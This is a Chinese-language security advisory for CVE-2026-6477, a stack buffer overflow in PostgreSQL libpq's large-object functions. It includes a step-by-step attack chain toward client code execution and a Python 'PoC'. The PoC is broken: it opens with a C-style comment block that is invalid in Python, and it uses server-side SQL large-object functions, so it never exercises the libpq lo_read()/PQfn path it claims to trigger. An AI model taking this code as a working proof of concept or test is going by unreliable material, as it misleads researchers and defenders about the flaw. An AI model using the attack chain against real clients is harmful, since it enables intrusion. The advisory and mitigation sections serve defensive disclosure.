CVE-2026-6477 PostgreSQL libpq缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-6477

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PostgreSQL

漏洞概述

PostgreSQL libpq库中的lo_export()、lo_read()、lo_lseek64()和lo_tell64()函数使用了存在固有危险的PQfn函数。该漏洞允许服务器超级用户利用任意大的响应覆盖客户端的堆栈缓冲区。由于psql中的\lo_export命令和pg_dump都会调用lo_read()，因此服务器超级用户可以覆盖pg_dump或psql的堆栈内存。受影响的版本包括PostgreSQL 18.4、17.10、16.14、15.18和14.23之前的所有版本。

技术细节

该漏洞源于PostgreSQL客户端库libpq在处理大对象相关函数时，存在堆栈缓冲区溢出风险。具体而言，lo_export、lo_read等函数通过调用PQfn(..., result_is_int=0, ...)来接收数据。该函数设计上存在类似gets()的缺陷，即能够将服务器返回的任意长度数据写入客户端未指定大小的缓冲区中，且未进行严格的长度校验。攻击者若拥有数据库超级用户权限（或诱导用户连接恶意服务器），可在客户端执行\lo_export命令或运行pg_dump时，发送特制的超长数据包。这将导致客户端程序的堆栈缓冲区被覆盖，进而可能覆盖返回地址，使得攻击者能够在客户端机器上执行任意代码，造成严重的安全后果。

攻击链分析

STEP 1

步骤1

攻击者获取PostgreSQL服务器的超级用户权限，或者诱导受害者连接到一个由攻击者控制的恶意PostgreSQL服务器。

STEP 2

步骤2

受害者使用易受攻击的客户端工具（如psql或pg_dump）连接到该服务器。

STEP 3

步骤3

受害者或自动备份脚本触发大对象操作，例如在psql中执行\lo_export命令，或者运行pg_dump进行数据库备份。

STEP 4

步骤4

客户端调用libpq中的lo_read()等函数，该函数内部使用PQfn(..., result_is_int=0, ...)请求数据。

STEP 5

步骤5

恶意服务器响应一个超长的数据包。由于PQfn函数未检查数据长度，导致数据溢出客户端的栈缓冲区。

STEP 6

步骤6

攻击者利用溢出覆盖返回地址，在客户端机器上执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-6477
 * This script demonstrates the client-side trigger (lo_read).
 * Exploitation requires a malicious PostgreSQL server sending oversized data.
 */

import psycopg2
import sys

try:
    # Connect to the target PostgreSQL database
    # Note: The server side must be malicious or compromised to exploit this
    conn = psycopg2.connect(
        dbname="testdb",
        user="postgres",
        password="password",
        host="127.0.0.1",
        port="5432"
    )
    conn.autocommit = True
    cursor = conn.cursor()

    # Create a large object (OID)
    # In a real exploit scenario, the malicious server handles the response
    cursor.execute("SELECT lo_create(0)")
    loid = cursor.fetchone()[0]
    print(f"Created Large Object with OID: {loid}")

    # Attempt to open and read the large object
    # This triggers the vulnerable lo_read() function in libpq
    # If the server sends a huge response, a stack buffer overflow occurs
    cursor.execute("SELECT lo_open(%s, %s)", (loid, 0x20000))
    fd = cursor.fetchone()[0]
    
    # Reading data triggers PQfn with result_is_int=0
    cursor.execute("SELECT loread(%s, 1000)", (fd,))
    data = cursor.fetchone()[0]
    
    print("Read operation completed (Check client crash/RCE)")

    # Cleanup
    cursor.execute("SELECT lo_unlink(%s)", (loid,))

except Exception as e:
    print(f"Error: {e}")
finally:
    if 'conn' in locals():
        conn.close()

影响范围

PostgreSQL < 14.23

PostgreSQL < 15.18

PostgreSQL < 16.14

PostgreSQL < 17.10

PostgreSQL < 18.4

防御指南

临时缓解措施

建议立即升级到官方发布的修复版本。如果暂时无法升级，应严格限制对数据库超级用户的访问，并确保数据库服务器本身的安全性，防止其被恶意控制。此外，应避免使用psql的\lo_export命令或pg_dump工具连接到不受信任或已被攻陷的PostgreSQL服务器，以防止客户端遭受缓冲区溢出攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6477
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6477
3 Details https://www.cvedetails.com/cve/CVE-2026-6477/
4 VulDB https://vuldb.com/cve/CVE-2026-6477
5 Link https://www.postgresql.org/support/security/CVE-2026-6477/